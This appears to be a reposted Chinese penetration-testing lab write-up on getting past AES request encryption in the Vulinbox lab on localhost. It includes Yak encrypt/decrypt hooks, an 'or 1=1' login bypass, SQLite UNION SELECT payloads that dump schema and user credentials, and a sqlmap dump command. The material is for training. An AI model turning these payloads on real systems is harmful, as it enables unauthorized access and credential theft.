渗透测试-前后端加密分析之AES加密下的SQL注入
本文是高级前端加解密与验签实战的第9篇文章,也是最后一篇文章。本系列文章实行靶场为Yakit里自带的Vulinbox靶场,本文讲述的是绕过前后端加密进行SQL注入。登录
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174649522-1108163498.png
输入账号暗码,抓包查看数据包,看上去就是一个普通的aes加密:
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174651133-1397250929.png
这里热加载代码不算太难,常规的加解密函数就可以了:
encryptAES = (packet) => {
body = poc.GetHTTPPacketBody(packet)
// 生成随机key和iv
key =randstr(16)
iv = randstr(12)
// 加密数据
data = codec.AESCBCEncrypt(key /*type: []byte*/, body, iv /*type: []byte*/)~
data = codec.EncodeBase64(data)
// 获取key和iv的hex值
hexKey = codec.EncodeToHex(key)
hexIV = codec.EncodeToHex(iv)
// 构造新的body
body = f`{"key": "${hexKey}","iv": "${hexIV}","message": "${data}"}`
return poc.ReplaceBody(packet, body, false)
}
decryptAES = (packet) => {
body = poc.GetHTTPPacketBody(packet)
body = json.loads(body)
key = codec.DecodeHex(body.key)~
iv = codec.DecodeHex(body.iv)~
data = codec.DecodeBase64(body.message)~
data = codec.AESCBCDecrypt(key, data, iv)~
return poc.ReplaceBody(packet, data, false)
}
beforeRequest = func(req){
return encryptAES(req)
}
afterRequest = func(rsp){
return decryptAES(rsp)
}哀求体格式
{"username":"admin","password":"password"}热加载加解密成功
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174705787-2068326505.png
本关提示是SQL注入,所以直接啪一个1=1,说时迟当时快,直接登陆成功
POST /crypto/sqli/aes-ecb/encrypt/login HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json
{"username":"admin","password":"password'or 1=1--"}https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174708984-532270764.png
注入
手工
登陆后看到哀求了/crypto/sqli/aes-ecb/encrypt/query/users路径
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174717030-1248920885.png
解密一下哀求包:
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174720155-1508659664.png
获取到哀求的格式:
{"search":""}https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174723767-2076971252.png
这里是SQLite注入,注入的语句是通过这篇文章获取的:sqlite注入的一点总结 - 先知社区 (aliyun.com)
{"search":"user1'order by 3--"}{"search":"user1'union select 1,2,3--"}{"search":"user1'union select 11,22,sql from sqlite_master--"}{"search":"user1'union select 11,22,sql from sqlite_master where type='table' and name='vulin_users'--"}{"search":"user1'union select username,password,id from vulin_users--"}注入成功:
POST /crypto/sqli/aes-ecb/encrypt/query/users HTTP/1.1
Host: 127.0.0.1:8787
Cookie: token=PLNqoZMZfiELLLFuTbmOtSrDdnpFmDDM
Content-Type: application/json
Content-Length: 119
{"search":"user1'union select username,password,id from vulin_users--"}https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174730943-448657941.png
sqlmap
在MITM处加载热加载代码
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174733181-1784897463.png
使用sqlmap注入
python .\sqlmap.py -r .\http.txt --proxy=http://127.0.0.1:8081 --batch -dbms=sqlite -T vulin_users -C username,password,role --dumphttp.txt
POST /crypto/sqli/aes-ecb/encrypt/query/users HTTP/1.1
Host: 127.0.0.1:8787
Cookie: token=PLNqoZMZfiELLLFuTbmOtSrDdnpFmDDM
Content-Type: application/json
Content-Length: 119
{"search":"*"}效果:
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174737032-281899828.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]